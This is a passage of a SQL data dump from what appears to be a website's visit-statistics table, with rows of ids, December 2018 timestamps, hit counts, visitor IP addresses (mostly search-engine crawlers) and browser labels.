1543914714,4,4,0,0,'91.196.178.66','chrome'),(345915,1543914749,1,1,0,0,'8.29.198.26','other'),(345916,1543914812,3,3,0,0,'40.77.167.41','other'),(345917,1543914849,1,1,0,0,'40.77.167.40','other'),(345918,1543915138,4,4,0,0,'157.55.39.207','other'),(345919,1543915353,1,1,0,0,'54.36.148.180','other'),(345920,1543915358,1,1,0,0,'54.36.148.233','other'),(345921,1543915769,1,1,0,0,'13.57.233.99','chrome'),(345922,1543915874,2,2,0,0,'40.77.167.41','other'),(345923,1543916041,4,4,0,0,'5.45.207.79','other'),(345924,1543916100,1,1,0,0,'141.8.142.103','other'),(345925,1543916125,1,1,0,0,'54.36.148.16','other'),(345926,1543916138,10,10,0,0,'178.154.244.29','other'),(345927,1543916156,5,5,0,0,'178.154.244.11','other'),(345928,1543916159,1,1,0,0,'87.250.224.47','other'),(345929,1543916266,4,4,0,0,'40.77.167.40','other'),(345930,1543916281,1,1,0,0,'95.132.134.51','chrome'),(345931,1543916313,1,1,0,0,'37.9.113.20','other'),(345932,1543916325,1,1,0,0,'46.229.168.145','other'),(345933,1543916330,1,1,0,0,'46.229.168.151','other'),(345934,1543916531,1,1,0,0,'5.45.207.19','other'),(345935,1543916675,1,1,0,0,'8.29.198.27','other'),(345936,1543916723,1,1,0,0,'46.229.168.139','other'),(345937,1543916725,1,1,0,0,'46.229.168.153','other'),(345938,1543916750,1,1,0,0,'8.29.198.26','other'),(345939,1543917159,4,4,0,0,'178.154.244.29','other'),(345940,1543917316,1,1,0,0,'46.229.168.146','other'),(345941,1543917555,1,1,0,0,'54.36.148.95','other'),(345942,1543917914,1,1,0,0,'157.55.39.207','other'),(345943,1543917968,4,4,0,0,'40.77.167.40','other'),(345944,1543918019,4,4,0,0,'40.77.167.43','other'),(345945,1543918112,2,2,0,0,'40.77.167.41','other'),(345946,1543918762,1,1,0,0,'46.229.168.154','other'),(345947,1543919398,6,6,0,0,'40.77.167.40','other'),(345948,1543919870,6,6,0,0,'40.77.167.41','other'),(345949,1543920321,1,1,0,0,'54.36.148.94','other'),(345950,1543920643,2,2,0,0,'130.180.217.29','chrome'),(345951,1543920851,2,2,0,0,'40.77.167.40','other'),(345952,1543920863,1,1,0,0,'54.36.148.214','other'),(345953,1543920938,3,3,0,0,'157.55.39.207','other'),(345954,1543921226,1,1,0,0,'94.179.48.200','chrome'),(345955,1543921347,2,2,0,0,'40.77.167.43','other'),(345956,1543921417,1,1,0,0,'40.77.167.41','other'),(345957,1543921688,1,1,0,0,'178.154.244.11','other'),(345958,1543921689,3,3,0,0,'178.154.244.29','other'),(345959,1543922302,2,2,0,0,'91.242.162.52','other'),(345960,1543922484,1,1,0,0,'46.229.168.154','other'),(345961,1543922678,3,3,0,0,'40.77.167.43','other'),(345962,1543922701,3,3,0,0,'40.77.167.40','other'),(345963,1543923718,1,1,0,0,'46.229.168.143','other'),(345964,1543923877,1,1,0,0,'87.250.224.65','other'),(345965,1543923948,3,3,0,0,'37.9.113.20','other'),(345966,1543923971,9,9,0,0,'178.154.244.29','other'),(345967,1543923986,2,2,0,0,'5.45.207.79','other'),(345968,1543924016,2,2,0,0,'141.8.142.103','other'),(345969,1543924029,12,12,0,0,'178.154.244.11','other'),(345970,1543924060,1,1,0,0,'37.9.113.103','other'),(345971,1543924098,3,3,0,0,'157.55.39.207','other'),(345972,1543924437,1,1,0,0,'87.250.224.47','other'),(345973,1543924813,1,1,0,0,'54.36.148.107','other'),(345974,1543924834,1,1,0,0,'54.36.149.21','other'),(345975,1543924940,2,2,0,0,'178.154.244.11','other'),(345976,1543925145,2,2,0,0,'207.46.13.106','other'),(345977,1543925215,4,4,0,0,'40.77.167.43','other'),(345978,1543925489,1,1,0,0,'54.36.148.144','other'),(345979,1543925605,1,1,0,0,'8.29.198.26','other'),(345980,1543925758,1,1,0,0,'46.229.168.153','other'),(345981,1543926298,1,1,0,0,'54.36.149.72','other'),(345982,1543926489,1,1,0,0,'91.196.178.104','other'),(345983,1543926644,1,1,0,0,'54.36.148.167','other'),(345984,1543926655,1,1,0,0,'40.77.167.43','other'),(345985,1543926791,1,1,0,0,'46.229.168.144','other'),(345986,1543926793,1,1,0,0,'46.229.168.148','other'),(345987,1543927541,1,1,0,0,'8.29.198.25','other'),(345988,1543927606,1,1,0,0,'8.29.198.27','other'),(345989,1543928038,1,1,0,0,'66.249.64.61','chrome'),(345990,1543928069,1,1,0,0,'66.249.64.40','chrome'),(345991,1543928287,1,1,0,0,'66.249.64.41','chrome'),(345992,1543928288,1,1,0,0,'66.249.64.62','chrome'),(345993,1543928363,1,1,0,0,'54.36.148.119','other'),(345994,1543929139,1,1,0,0,'46.229.168.153','other'),(345995,1543929258,1,1,0,0,'54.36.149.56','other'),(345996,1543929490,1,1,0,0,'54.36.149.63','other'),(345997,1543929616,2,2,0,0,'91.196.178.66','chrome'),(345998,1543929692,1,1,0,0,'66.102.9.40','chrome'),(345999,1543929693,1,1,0,0,'66.102.9.58','chrome'),(346000,1543929778,1,1,0,0,'35.187.132.181','chrome'),(346001,1543929780,1,1,0,0,'35.187.132.182','chrome'),(346002,1543930008,1,1,0,0,'40.77.167.41','other'),(346003,1543930377,1,1,0,0,'66.249.64.41','chrome'),(346004,1543930380,1,1,0,0,'66.249.64.62','chrome'),(346005,1543930513,2,2,0,0,'178.154.244.29','other'),(346006,1543931576,10,10,0,0,'178.154.244.11','other'),(346007,1543931577,14,14,0,0,'178.154.244.29','other'),(346008,1543931608,4,4,0,0,'5.45.207.19','other'),(346009,1543931688,1,1,0,0,'141.8.142.103','other'),(346010,1543932273,1,1,0,0,'54.36.149.77','other'),(346011,1543932565,1,1,0,0,'54.36.148.12','other'),(346012,1543932641,2,2,0,0,'178.154.244.29','other'),(346013,1543932901,1,1,0,0,'178.154.244.11','other'),(346014,1543933706,2,2,0,0,'95.163.255.64','other'),(346015,1543933709,1,1,0,0,'95.163.255.66','other'),(346016,1543934468,1,1,0,0,'95.163.255.62','other'),(346017,1543934563,1,1,0,0,'54.36.148.56','other'),(346018,1543934602,1,1,0,0,'91.196.178.130','chrome'),(346019,1543934681,1,1,0,0,'40.77.167.88','other'),(346020,1543934733,1,1,0,0,'46.211.10.131','chrome'),(346021,1543935316,4,4,0,0,'91.196.178.169','chrome'),(346022,1543935611,1,1,0,0,'54.36.149.22','other'),(346023,1543935679,2,2,0,0,'40.77.167.88','other'),(346024,1543935896,1,1,0,0,'54.36.148.16','other'),(346025,1543936017,1,1,0,0,'54.36.148.18','other'),(346026,1543936056,1,1,0,0,'54.36.148.210','other'),(346027,1543936443,1,1,0,0,'8.29.198.26','other'),(346028,1543936691,1,1,0,0,'54.36.148.75','other'),(346029,1543936907,2,2,0,0,'40.77.167.41','other'),(346030,1543937022,1,1,0,0,'157.55.39.98','other'),(346031,1543937539,1,1,0,0,'54.36.149.24','other'),(346032,1543937542,1,1,0,0,'207.46.13.106','other'),(346033,1543937571,1,1,0,0,'46.229.168.151','other'),(346034,1543937574,1,1,0,0,'46.229.168.147','other'),(346035,1543937687,1,1,0,0,'209.17.97.66','other'),(346036,1543937853,1,1,0,0,'54.36.148.134','other'),(346037,1543938003,1,1,0,0,'54.36.148.205','other'),(346038,1543938064,2,2,0,0,'157.55.39.207','other'),(346039,1543938249,1,1,0,0,'178.154.244.11','other'),(346040,1543938353,1,1,0,0,'46.229.168.129','other'),(346041,1543938391,2,2,0,0,'8.29.198.26','other'),(346042,1543938497,2,2,0,0,'40.77.167.88','other'),(346043,1543938543,1,1,0,0,'178.154.244.29','other'),(346044,1543938702,3,3,0,0,'157.55.39.98','other'),(346045,1543938775,1,1,0,0,'95.163.255.97','other'),(346046,1543938778,1,1,0,0,'95.163.255.96','other'),(346047,1543939810,1,1,0,0,'54.36.148.236','other'),(346048,1543940059,2,2,0,0,'40.77.167.88','other'),(346049,1543940061,1,1,0,0,'91.196.178.45','chrome'),(346050,1543940165,1,1,0,0,'31.13.115.10','other'),(346051,1543940169,2,2,0,0,'31.13.115.7','other'),(346052,1543940170,1,1,0,0,'31.13.115.12','other'),(346053,1543940199,1,1,0,0,'31.13.115.17','other'),(346054,1543940222,1,1,0,0,'66.220.149.24','other'),(346055,1543940636,1,1,0,0,'31.13.115.1','other'),(346056,1543940726,1,1,0,0,'54.36.149.54','other'),(346057,1543941039,2,2,0,0,'87.250.224.65','other'),(346058,1543941042,17,17,0,0,'178.154.244.29','other'),(346059,1543941081,5,5,0,0,'178.154.244.11','other'),(346060,1543941094,1,1,0,0,'40.77.167.88','other'),(346061,1543941162,1,1,0,0,'46.211.46.188','chrome'),(346062,1543941476,2,2,0,0,'157.55.39.98','other'),(346063,1543941517,1,1,0,0,'37.9.113.20','other'),(346064,1543941555,2,2,0,0,'5.45.207.79','other'),(346065,1543941565,1,1,0,0,'46.229.168.136','other'),(346066,1543942003,2,2,0,0,'40.77.167.41','other'),(346067,1543942143,1,1,0,0,'180.76.15.137','other'),(346068,1543942144,1,1,0,0,'180.76.15.139','other'),(346069,1543942508,1,1,0,0,'91.242.162.20','other'),(346070,1543942798,1,1,0,0,'40.77.167.88','other'),(346071,1543942829,1,1,0,0,'157.55.39.207','other'),(346072,1543942888,2,2,0,0,'178.154.244.29','other'),(346073,1543943419,1,1,0,0,'178.154.244.11','other'),(346074,1543943428,3,3,0,0,'157.55.39.98','other'),(346075,1543943754,1,1,0,0,'40.77.167.41','other'),(346076,1543943836,2,2,0,0,'91.242.162.20','other'),(346077,1543944216,1,1,0,0,'54.36.148.101','other'),(346078,1543944355,1,1,0,0,'157.55.39.98','other'),(346079,1543944988,1,1,0,0,'95.163.255.107','other'),(346080,1543945059,1,1,0,0,'54.36.148.221','other'),(346081,1543945080,1,1,0,0,'95.163.255.108','other'),(346082,1543945142,1,1,0,0,'91.242.162.20','other'),(346083,1543945166,2,2,0,0,'95.163.255.105','other'),(346084,1543945181,1,1,0,0,'54.36.148.121','other'),(346085,1543945218,1,1,0,0,'54.36.149.49','other'),(346086,1543945443,2,2,0,0,'95.163.255.109','other'),(346087,1543945528,1,1,0,0,'94.179.246.90','chrome'),(346088,1543945780,1,1,0,0,'54.36.148.136','other'),(346089,1543945841,1,1,0,0,'95.163.255.119','other'),(346090,1543945894,2,2,0,0,'220.243.135.225','chrome'),(346091,1543945898,1,1,0,0,'220.243.135.216','chrome'),(346092,1543946130,1,1,0,0,'95.163.255.118','other'),(346093,1543946172,1,1,0,0,'54.36.148.110','other'),(346094,1543946227,2,2,0,0,'40.77.167.41','other'),(346095,1543946471,1,1,0,0,'66.249.66.42','chrome'),(346096,1543946598,1,1,0,0,'54.36.148.30','other'),(346097,1543947095,1,1,0,0,'54.36.148.19','other'),(346098,1543947174,1,0,1,0,'66.249.66.154',''),(346099,1543947291,1,1,0,0,'8.29.198.26','other'),(346100,1543947735,1,1,0,0,'209.17.96.234','other'),(346101,1543947758,1,1,0,0,'178.154.244.29','other'),(346102,1543948125,1,1,0,0,'178.255.215.94','other'),(346103,1543948376,1,1,0,0,'91.242.162.20','other'),(346104,1543948441,3,3,0,0,'157.55.39.207','other'),(346105,1543948472,2,2,0,0,'46.229.168.134','other'),(346106,1543948674,1,1,0,0,'40.77.167.41','other'),(346107,1543949047,1,1,0,0,'51.255.65.46','other'),(346108,1543949241,1,1,0,0,'8.29.198.26','other'),(346109,1543949246,1,1,0,0,'46.229.168.144','other'),(346110,1543949286,1,1,0,0,'8.29.198.27','other'),(346111,1543949412,1,1,0,0,'91.196.178.50','chrome'),(346112,1543949414,1,1,0,0,'93.78.185.2','chrome'),(346113,1543949825,1,1,0,0,'54.36.149.69','other'),(346115,1543949851,8,8,0,0,'178.154.244.29','other'),(346116,1543949922,1,1,0,0,'95.163.255.102','other'),(346117,1543949928,1,1,0,0,'95.163.255.104','other'),(346118,1543949935,2,2,0,0,'95.163.255.117','other'),(346119,1543949941,1,1,0,0,'95.163.255.119','other'),(346120,1543949955,1,1,0,0,'95.163.255.114','other'),(346121,1543950120,2,2,0,0,'157.55.39.98','other'),(346122,1543950160,1,1,0,0,'64.246.165.190','firefox'),(346123,1543950306,1,1,0,0,'37.55.96.160','firefox'),(346124,1543950404,1,1,0,0,'91.242.162.20','other'),(346125,1543950542,6,6,0,0,'5.45.207.79','other'),(346126,1543950580,9,9,0,0,'178.154.244.11','other'),(346127,1543950637,1,1,0,0,'54.36.148.92','other'),(346128,1543950711,1,1,0,0,'95.108.213.4','other'),(346129,1543950846,27,27,0,0,'178.154.244.29','other'),(346130,1543950866,1,1,0,0,'46.229.168.129','other'),(346131,1543951009,1,1,0,0,'207.46.13.156','other'),(346132,1543951072,1,1,0,0,'54.36.148.152','other'),(346133,1543951272,1,1,0,0,'54.36.149.64','other'),(346134,1543951418,1,1,0,0,'54.36.148.95','other'),(346135,1543951515,1,1,0,0,'66.249.66.40','chrome'),(346136,1543951669,1,1,0,0,'46.229.168.151','other'),(346137,1543951672,2,2,0,0,'46.229.168.149','other'),(346138,1543951719,2,2,0,0,'157.55.39.97','other'),(346139,1543951764,1,1,0,0,'37.55.96.160','firefox'),(346140,1543951904,1,1,0,0,'178.92.34.52','msie'),(346141,1543952054,1,1,0,0,'54.36.148.117','other'),(346142,1543952074,3,3,0,0,'157.55.39.207','other'),(346143,1543952106,1,1,0,0,'178.154.244.29','other'),(346144,1543952178,1,1,0,0,'54.36.148.54','other'),(346145,1543952309,1,1,0,0,'157.55.39.98','other'),(346146,1543952463,2,2,0,0,'91.242.162.20','other'),(346147,1543952531,1,1,0,0,'91.196.178.89','chrome'),(346148,1543952608,1,1,0,0,'54.36.148.146','other'),(346149,1543952641,1,1,0,0,'178.92.34.52','firefox'),(346150,1543952688,1,1,0,0,'46.229.168.152','other'),(346151,1543952861,1,1,0,0,'54.36.149.29','other'),(346152,1543953228,3,3,0,0,'40.77.167.138','other'),(346153,1543953334,1,1,0,0,'157.55.39.207','other'),(346154,1543953385,1,1,0,0,'54.36.149.8','other'),(346155,1543953735,2,2,0,0,'178.154.244.11','other'),(346156,1543953736,1,1,0,0,'178.154.244.29','other'),(346157,1543953751,1,1,0,0,'54.36.148.96','other'),(346158,1543953788,2,2,0,0,'207.46.13.155','other'),(346159,1543953836,2,2,0,0,'46.229.168.141','other'),(346160,1543954142,2,2,0,0,'40.77.167.138','other'),(346161,1543954195,2,2,0,0,'157.55.39.98','other'),(346162,1543954258,1,1,0,0,'95.163.255.112','other'),(346163,1543954273,1,1,0,0,'95.163.255.103','other'),(346164,1543955126,1,1,0,0,'157.55.39.98','other'),(346165,1543955318,1,1,0,0,'95.163.255.155','other'),(346166,1543955321,1,1,0,0,'95.163.255.180','other'),(346167,1543955889,1,1,0,0,'91.242.162.20','other'),(346168,1543956317,1,1,0,0,'54.36.148.102','other'),(346169,1543956600,2,2,0,0,'52.53.201.78','chrome'),(346170,1543956822,1,1,0,0,'66.249.66.44','chrome'),(346171,1543956997,1,1,0,0,'207.46.13.155','other'),(346172,1543957230,1,0,1,0,'66.249.66.152',''),(346173,1543957300,2,2,0,0,'91.196.178.77','firefox'),(346174,1543957317,1,1,0,0,'66.249.66.155','chrome'),(346175,1543957450,1,1,0,0,'95.163.255.112','other'),(346176,1543957482,4,4,0,0,'91.242.162.20','other'),(346177,1543957567,1,1,0,0,'66.249.66.152','chrome'),(346178,1543957634,1,1,0,0,'95.163.255.105','other'),(346179,1543957826,1,1,0,0,'40.77.167.138','other'),(346180,1543957842,1,1,0,0,'95.163.255.102','other'),(346181,1543957869,1,1,0,0,'46.229.168.129','other'),(346182,1543957873,1,1,0,0,'46.229.168.137','other'),(346183,1543957956,1,1,0,0,'95.163.255.108','other'),(346184,1543958129,1,1,0,0,'54.36.148.158','other'),(346185,1543958163,1,1,0,0,'8.29.198.25','other'),(346186,1543958540,2,2,0,0,'91.196.178.39','chrome'),(346187,1543958561,2,2,0,0,'40.77.167.129','other'),(346188,1543958622,2,2,0,0,'91.242.162.20','other'),(346189,1543958631,1,1,0,0,'54.36.148.16','other'),(346190,1543958671,1,1,0,0,'54.36.148.78','other'),(346191,1543958894,1,1,0,0,'54.36.148.143','other'),(346192,1543958947,1,1,0,0,'40.77.167.138','other'),(346193,1543959074,1,1,0,0,'66.249.66.156','chrome'),(346194,1543959126,1,1,0,0,'54.36.148.93','other'),(346195,1543959268,1,1,0,0,'40.77.167.70','other'),(346196,1543959463,1,1,0,0,'46.229.168.142','other'),(346197,1543959781,6,6,0,0,'5.45.207.79','other'),(346198,1543959786,16,16,0,0,'178.154.244.11','other'),(346199,1543959821,12,12,0,0,'178.154.244.29','other'),(346200,1543960079,1,1,0,0,'8.29.198.25','other'),(346201,1543960142,1,1,0,0,'8.29.198.27','other'),(346202,1543960254,1,1,0,0,'109.87.227.138','other'),(346203,1543960432,1,1,0,0,'54.36.148.74','other'),(346204,1543960447,1,1,0,0,'54.36.148.183','other'),(346205,1543960486,1,1,0,0,'54.36.148.236','other'),(346206,1543960727,4,4,0,0,'178.154.244.11','other'),(346207,1543960891,8,8,0,0,'178.154.244.29','other'),(346208,1543960901,2,2,0,0,'5.45.207.79','other'),(346209,1543961446,1,1,0,0,'40.77.167.70','other'),(346210,1543962087,1,1,0,0,'157.55.39.129','other'),(346211,1543962363,1,1,0,0,'40.77.167.70','other'),(346212,1543962493,2,2,0,0,'157.55.39.219','other'),(346213,1543962918,1,1,0,0,'54.36.148.70','other'),(346214,1543963845,1,1,0,0,'46.229.168.143','other'),(346215,1543963847,1,1,0,0,'46.229.168.153','other'),(346216,1543963892,1,1,0,0,'46.229.168.146','other'),(346217,1543963894,1,1,0,0,'46.229.168.137','other'),(346218,1543964279,2,2,0,0,'40.77.167.70','other'),(346219,1543964688,1,1,0,0,'46.229.168.147','other'),(346220,1543964945,1,1,0,0,'37.53.125.42','msie'),(346221,1543965108,1,1,0,0,'54.36.148.178','other'),(346222,1543965587,2,2,0,0,'66.249.66.154','chrome'),(346223,1543965855,1,1,0,0,'66.249.66.40','chrome'),(346224,1543965940,5,5,0,0,'157.55.39.129','other'),(346225,1543965973,1,1,0,0,'66.249.66.156','chrome'),(346226,1543966640,2,2,0,0,'157.55.39.209','other'),(346227,1543966662,2,2,0,0,'95.213.141.126','opera'),(346228,1543968288,1,1,0,0,'54.36.148.213','other'),(346229,1543968476,2,2,0,0,'207.46.13.198','other'),(346230,1543968743,1,1,0,0,'66.249.66.156','chrome'),(346231,1543968762,1,1,0,0,'66.249.66.152','chrome'),(346232,1543969025,1,1,0,0,'8.29.198.26','other'),(346233,1543969051,6,6,0,0,'207.46.13.89','other'),(346234,1543969087,3,3,0,0,'157.55.39.129','other'),(346235,1543969311,1,1,0,0,'66.249.66.42','chrome'),(346236,1543969594,9,9,0,0,'178.154.244.11','other'),(346237,1543969608,6,6,0,0,'5.45.207.79','other'),(346238,1543969678,22,22,0,0,'178.154.244.29','other'),(346239,1543969723,1,1,0,0,'37.9.113.148','other'),(346240,1543970153,1,1,0,0,'207.46.13.198','other'),(346241,1543970460,1,1,0,0,'141.8.142.103','other'),(346242,1543970531,2,2,0,0,'5.45.207.19','other'),(346243,1543970540,3,3,0,0,'178.154.244.11','other'),(346244,1543970595,4,4,0,0,'178.154.244.29','other'),(346245,1543970836,2,2,0,0,'66.249.66.157','chrome'),(346246,1543970855,1,1,0,0,'66.249.66.154','chrome'),(346247,1543970928,2,2,0,0,'8.29.198.25','other'),(346248,1543970990,2,2,0,0,'157.55.39.129','other'),(346249,1543971061,1,1,0,0,'66.249.66.156','chrome'),(346250,1543971088,1,1,0,0,'213.180.203.40','other'),(346251,1543971341,1,1,0,0,'217.182.168.178','other'),(346252,1543971361,1,1,0,0,'37.139.8.104','other'),(346253,1543971419,1,1,0,0,'46.229.168.147','other'),(346254,1543971421,1,1,0,0,'46.229.168.150','other'),(346255,1543971865,1,1,0,0,'178.154.244.29','other'),(346256,1543972019,1,1,0,0,'54.36.148.91','other'),(346257,1543972594,1,1,0,0,'66.249.66.156','chrome'),(346258,1543972620,1,1,0,0,'66.249.66.154','chrome'),(346259,1543972652,1,1,0,0,'207.46.13.198','other'),(346260,1543972752,1,1,0,0,'46.229.168.144','other'),(346261,1543972827,1,1,0,0,'54.36.149.91','other'),(346262,1543972850,1,1,0,0,'54.36.148.56','other'),(346263,1543973002,1,1,0,0,'54.36.148.169','other'),(346264,1543973482,4,4,0,0,'157.55.39.219','other'),(346265,1543973750,1,1,0,0,'54.36.148.225','other'),(346266,1543974017,2,2,0,0,'157.55.39.129','other'),(346267,1543974145,1,1,0,0,'54.36.148.119','other'),(346268,1543975110,3,3,0,0,'157.55.39.219','other'),(346269,1543975519,1,1,0,0,'66.249.66.157','chrome'),(346270,1543975551,1,1,0,0,'66.249.66.154','chrome'),(346271,1543975656,2,2,0,0,'18.236.110.123','chrome'),(346272,1543976114,1,1,0,0,'54.36.148.49','other'),(346273,1543976224,1,1,0,0,'178.154.244.11','other'),(346274,1543976609,1,1,0,0,'66.249.66.155','chrome'),(346275,1543976628,1,1,0,0,'66.249.66.154','chrome'),(346276,1543977307,2,2,0,0,'37.73.223.87','chrome'),(346277,1543977531,1,1,0,0,'66.249.66.154','chrome'),(346278,1543977553,1,1,0,0,'54.36.149.73','other'),(346279,1543977836,1,1,0,0,'207.46.13.89','other'),(346280,1543978106,2,2,0,0,'207.46.13.198','other'),(346281,1543978281,1,1,0,0,'66.249.66.57','chrome'),(346282,1543978810,1,1,0,0,'54.36.148.172','other'),(346283,1543979371,3,3,0,0,'207.46.13.89','other'),(346284,1543979605,2,2,0,0,'66.249.66.156','chrome'),(346285,1543979864,1,1,0,0,'8.29.198.27','other'),(346286,1543980058,2,2,0,0,'159.65.191.106','other'),(346287,1543980174,4,4,0,0,'157.55.39.219','other'),(346288,1543980241,4,4,0,0,'207.46.13.198','other'),(346289,1543980498,1,1,0,0,'46.229.168.139','other'),(346290,1543980505,12,12,0,0,'178.154.244.11','other'),(346291,1543980607,17,17,0,0,'178.154.244.29','other'),(346292,1543980993,2,1,1,0,'66.249.66.156',''),(346293,1543981329,2,2,0,0,'207.46.13.198','other'),(346294,1543981616,1,0,1,0,'66.249.66.152',''),(346295,1543981677,1,1,0,0,'66.249.66.152','chrome'),(346296,1543981758,2,2,0,0,'8.29.198.26','other'),(346297,1543981808,1,1,0,0,'54.36.148.92','other'),(346298,1543982264,1,1,0,0,'178.154.244.11','other'),(346299,1543982369,2,2,0,0,'66.249.66.154','chrome'),(346300,1543982417,1,1,0,0,'95.163.255.184','other'),(346301,1543982420,1,1,0,0,'95.163.255.160','other'),(346302,1543982701,1,1,0,0,'66.249.66.44','chrome'),(346303,1543982739,1,0,1,0,'66.249.66.57',''),(346304,1543982745,1,0,1,0,'66.249.66.40',''),(346305,1543983180,1,1,0,0,'54.36.148.128','other'),(346306,1543983697,4,4,0,0,'157.55.39.129','other'),(346307,1543983730,1,1,0,0,'66.249.66.155','chrome'),(346308,1543983734,1,1,0,0,'66.249.66.154','chrome'),(346309,1543983990,1,1,0,0,'54.36.148.64','other'),(346310,1543984095,1,1,0,0,'46.229.168.141','other'),(346311,1543984806,1,1,0,0,'46.229.168.136','other'),(346312,1543984807,1,1,0,0,'46.229.168.134','other'),(346313,1543985020,1,1,0,0,'209.17.97.114','other'),(346314,1543985063,1,1,0,0,'54.36.149.30','other'),(346315,1543985132,1,1,0,0,'66.249.66.154','chrome'),(346316,1543985574,1,1,0,0,'54.36.149.55','other'),(346318,1543985619,3,3,0,0,'157.55.39.129','other'),(346319,1543986065,2,2,0,0,'66.249.66.154','chrome'),(346320,1543986076,1,1,0,0,'207.46.13.198','other'),(346321,1543986077,1,1,0,0,'46.229.168.136','other'),(346322,1543986191,1,1,0,0,'66.249.66.152','chrome'),(346323,1543986544,2,2,0,0,'207.46.13.89','other'),(346324,1543986695,1,1,0,0,'54.36.149.63','other'),(346325,1543987229,1,1,0,0,'54.36.148.103','other'),(346326,1543987645,3,3,0,0,'157.55.39.219','other'),(346327,1543987789,1,1,0,0,'54.36.148.207','other'),(346328,1543987995,1,1,0,0,'178.255.215.94','other'),(346329,1543988425,1,1,0,0,'5.196.87.67','other'),(346330,1543988698,1,1,0,0,'157.55.39.129','other'),(346331,1543988734,1,1,0,0,'66.249.66.61','chrome'),(346332,1543988758,1,1,0,0,'66.249.66.40','chrome'),(346333,1543988987,1,1,0,0,'54.36.148.68','other'),(346334,1543989192,1,1,0,0,'66.249.66.155','chrome'),(346335,1543989193,1,1,0,0,'66.249.66.157','chrome'),(346336,1543989201,2,2,0,0,'66.249.66.156','chrome'),(346337,1543989213,2,2,0,0,'66.249.66.152','chrome'),(346338,1543989218,1,1,0,0,'54.36.148.119','other'),(346339,1543989220,1,1,0,0,'54.36.148.187','other'),(346340,1543989562,1,1,0,0,'54.36.149.16','other'),(346341,1543989639,1,1,0,0,'66.249.66.42','chrome'),(346342,1543989665,1,1,0,0,'136.243.151.90','other'),(346343,1543989883,1,1,0,0,'54.36.148.111','other'),(346344,1543990190,1,1,0,0,'157.55.39.219','other'),(346345,1543990328,2,2,0,0,'91.196.178.134','firefox'),(346346,1543990504,1,1,0,0,'54.36.148.156','other'),(346347,1543990702,1,1,0,0,'8.29.198.27','other'),(346348,1543990879,4,4,0,0,'91.196.178.91','firefox'),(346349,1543991119,4,4,0,0,'66.249.66.152','chrome'),(346350,1543991127,1,1,0,0,'54.36.149.30','other'),(346351,1543991132,3,3,0,0,'66.249.66.154','chrome'),(346352,1543991328,2,2,0,0,'66.249.66.156','chrome'),(346353,1543991330,3,3,0,0,'66.249.66.42','chrome'),(346354,1543991411,1,1,0,0,'66.249.66.157','chrome'),(346355,1543991425,1,1,0,0,'54.36.149.27','other'),(346356,1543991609,1,1,0,0,'66.249.66.155','chrome'),(346357,1543991706,1,1,0,0,'95.163.255.176','other'),(346358,1543992045,2,2,0,0,'207.46.13.198','other'),(346359,1543992483,1,1,0,0,'54.36.148.99','other'),(346360,1543992598,1,1,0,0,'8.29.198.27','other'),(346361,1543992673,1,1,0,0,'8.29.198.25','other'),(346362,1543992794,3,3,0,0,'91.196.178.70','chrome'),(346363,1543992814,15,15,0,0,'178.154.244.11','other'),(346364,1543992947,18,18,0,0,'178.154.244.29','other'),(346365,1543993007,2,2,0,0,'5.45.207.19','other'),(346366,1543993035,2,2,0,0,'157.55.39.129','other'),(346367,1543993077,4,4,0,0,'66.249.66.154','chrome'),(346368,1543993217,2,2,0,0,'141.8.142.103','other'),(346369,1543993235,3,3,0,0,'157.55.39.219','other'),(346370,1543993403,1,1,0,0,'54.36.148.140','other'),(346371,1543993417,1,1,0,0,'207.46.13.89','other'),(346372,1543993446,2,2,0,0,'66.249.66.156','chrome'),(346373,1543993595,1,1,0,0,'66.249.66.40','chrome'),(346374,1543993705,3,3,0,0,'5.45.207.79','other'),(346375,1543993782,1,1,0,0,'46.229.168.147','other'),(346376,1543993869,9,9,0,0,'178.154.244.11','other'),(346377,1543993907,16,16,0,0,'178.154.244.29','other'),(346378,1543993957,1,1,0,0,'5.45.207.19','other'),(346379,1543994081,1,1,0,0,'87.250.224.47','other'),(346380,1543994228,3,3,0,0,'157.55.39.129','other'),(346381,1543994334,1,1,0,0,'95.163.255.186','other'),(346382,1543994337,1,1,0,0,'95.163.255.196','other'),(346383,1543994545,1,1,0,0,'37.187.134.60','other'),(346384,1543994565,6,6,0,0,'37.53.228.75','chrome'),(346385,1543994654,1,1,0,0,'91.196.178.170','chrome'),(346386,1543994725,1,1,0,0,'46.229.168.148','other'),(346387,1543994784,1,1,0,0,'54.36.148.74','other'),(346388,1543994829,2,2,0,0,'178.154.244.29','other'),(346389,1543995271,1,1,0,0,'66.249.66.44','chrome'),(346390,1543995421,1,1,0,0,'39.104.110.131','other'),(346391,1543995455,2,2,0,0,'157.55.39.129','other'),(346392,1543995885,2,2,0,0,'207.46.13.89','other'),(346393,1543996537,1,1,0,0,'54.36.148.246','other'),(346394,1543996689,1,1,0,0,'54.36.148.165','other'),(346395,1543996974,1,1,0,0,'66.249.66.152','chrome'),(346396,1543997354,1,1,0,0,'66.249.66.42','chrome'),(346397,1543997563,2,2,0,0,'157.55.39.129','other'),(346398,1543997678,1,1,0,0,'66.249.66.154','chrome'),(346399,1543997763,1,1,0,0,'54.36.148.218','other'),(346400,1543997774,1,1,0,0,'94.154.233.96','chrome'),(346401,1543998053,2,2,0,0,'157.55.39.219','other'),(346402,1543998151,2,2,0,0,'91.196.178.76','firefox'),(346403,1543998242,1,1,0,0,'46.229.168.141','other'),(346404,1543998245,1,1,0,0,'46.229.168.146','other'),(346405,1543998499,1,1,0,0,'46.229.168.133','other'),(346406,1543998502,1,1,0,0,'46.229.168.152','other'),(346407,1543998793,13,13,0,0,'23.237.4.26','other'),(346408,1543999092,1,1,0,0,'66.249.66.44','chrome'),(346409,1543999512,1,1,0,0,'66.249.66.156','chrome'),(346410,1543999629,1,1,0,0,'91.196.178.76','firefox'),(346411,1544000095,3,3,0,0,'207.46.13.89','other'),(346412,1544000942,1,1,0,0,'157.55.39.219','other'),(346413,1544001384,2,2,0,0,'66.249.66.154','chrome'),(346414,1544001540,1,1,0,0,'8.29.198.25','other'),(346415,1544001579,1,1,0,0,'217.12.213.166','chrome'),(346416,1544001714,1,1,0,0,'37.73.106.7','chrome'),(346417,1544001785,3,3,0,0,'66.249.66.156','chrome'),(346418,1544001967,1,1,0,0,'66.249.66.152','chrome'),(346419,1544002480,1,1,0,0,'66.249.66.157','chrome'),(346420,1544002483,4,4,0,0,'66.249.66.154','chrome'),(346421,1544002866,1,1,0,0,'54.36.148.36','other'),(346422,1544002939,1,1,0,0,'66.249.66.152','chrome'),(346423,1544003063,1,1,0,0,'207.46.13.89','other'),(346424,1544003294,1,1,0,0,'54.36.148.119','other'),(346425,1544003455,1,1,0,0,'8.29.198.25','other'),(346426,154